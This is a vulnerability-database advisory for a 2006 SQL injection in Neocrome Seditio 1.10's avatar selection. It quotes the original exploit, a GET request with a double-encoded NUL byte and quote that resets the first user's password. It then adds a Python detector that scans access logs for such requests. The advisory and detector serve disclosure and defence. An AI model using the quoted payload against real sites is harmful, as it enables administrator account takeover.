Neocrome Seditio users.profile.inc.php SQL Injection Vulnerability

Vulnerability ID: 1111632  Vulnerability type: SQL injection
Published: 2006-11-21  Updated: 2006-11-30
CVE: CVE-2006-6177  CNNVD ID: CNNVD-200611-489
Platform: PHP  CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/2820
https://www.securityfocus.com/bid/77908
https://cxsecurity.com/issue/WLB-2006120003
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-489
|Vulnerability details
system/core/users/users.profile.inc.php in Neocrome Seditio 1.10 and earlier contains an SQL injection vulnerability. A remote authenticated user can execute arbitrary SQL commands through a double-URL-encoded id parameter passed to users.php that begins with a valid filename, for example "default.gif" followed by an encoded NULL byte and an encoded ' (apostrophe), i.e. %2500%2527. The double encoding matters because the application decodes the value a second time after its input checks have already seen an apparently harmless filename.
|Vulnerability exploit (EXP)
Seditio <= 1.10 Remote SQL Injection (avatarselect id) Vulnerability
Discovered by: nukedx
Contacts: ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: http://www.nukedx.com
Original advisory can be found at: http://www.nukedx.com/?viewdoc=52
----
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example a remote attacker changes the password of the 1st user of Seditio to 123456
The XVALUE comes with your avatarselect link; it's specific to every user in Seditio.
To use this vulnerability you must be logged in to Seditio...

# nukedx.com [2006-11-21]

# milw0rm.com [2006-11-21]
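The description and the advisory above both turn on the same pattern: a value that looks like a plain avatar filename after one round of URL decoding, but contains a NUL byte and a quote after a second round. The following detector is an added example written for this page (it is not Seditio code and not part of the original advisory); it scans constructed web-server access-log lines for users.php avatarselect requests, decodes the id parameter until it stops changing, and flags double encoding, NUL bytes, quotes, or anything that is not a simple image filename. The avatar-filename pattern and the log lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); the second one carries a
# double-encoded id in the shape the advisory describes, with a placeholder hash.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Nov/2006:10:00:01 +0000] "GET /users.php?m=profile&a=avatarselect&x=011A99&id=default.gif HTTP/1.1" 200 512
10.0.0.7 - - [21/Nov/2006:10:00:02 +0000] "GET /users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527x%2527/**/where/**/user_id=1/* HTTP/1.1" 200 512
10.0.0.9 - - [21/Nov/2006:10:00:03 +0000] "GET /users.php?m=profile&a=avatarselect&x=011A99&id=default%2Egif HTTP/1.1" 200 512
"""

# Assumed shape of a legitimate avatar filename: a plain name with an image extension.
SAFE_AVATAR = re.compile(r"^[A-Za-z0-9_.-]{1,64}\.(?:gif|jpe?g|png)$", re.IGNORECASE)
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly until the value stops changing; return (value, rounds applied)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_request(target):
    """Return a finding for a suspicious users.php avatarselect request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/users.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # this is the first decoding round
    if qs.get("a") != ["avatarselect"]:
        return None
    for raw_id in qs.get("id", []):
        decoded, extra = fully_decode(raw_id)  # any change here means double encoding
        reasons = []
        if extra:
            reasons.append(f"double-encoded ({extra} extra decode round(s))")
        if "\x00" in decoded:
            reasons.append("NUL byte")
        if "'" in decoded:
            reasons.append("single quote")
        if not SAFE_AVATAR.match(decoded):
            reasons.append("not a plain avatar filename")
        if reasons:
            return {"id": decoded, "reasons": reasons}
    return None

def scan_log(text):
    """Run inspect_request over every request line in the log text; return the findings."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if m and (finding := inspect_request(m.group(1))):
            finding["line"] = line
            findings.append(finding)
    return findings
```

The third sample line shows why a single decoding round is not itself suspicious: `default%2Egif` decodes to a normal filename and is not flagged, while the second line is reported with all four reasons.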
|Affected products
Neocrome Seditio 1.10
|References

Source: VUPEN
Name: ADV-2006-4668
Link: http://www.frsirt.com/english/advisories/2006/4668
Source: SECUNIA
Name: 23054
Link: http://secunia.com/advisories/23054
Source: BUGTRAQ
Name: 20061122 Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.
Link: http://www.securityfocus.com/archive/1/archive/1/452269/100/100/threaded
Source: MISC
Link: http://www.nukedx.com/?viewdoc=52
Source: MISC
Link: http://www.nukedx.com/?getxpl=52
Source: www.neocrome.net
Link: http://www.neocrome.net/page.php?id=2233
Source: XF
Name: seditio-users-sql-injection(30466)
Link: http://xforce.iss.net/xforce/xfdb/30466
Source: SREASON
Name: 1931
Link: http://securityreason.com/securityalert/1931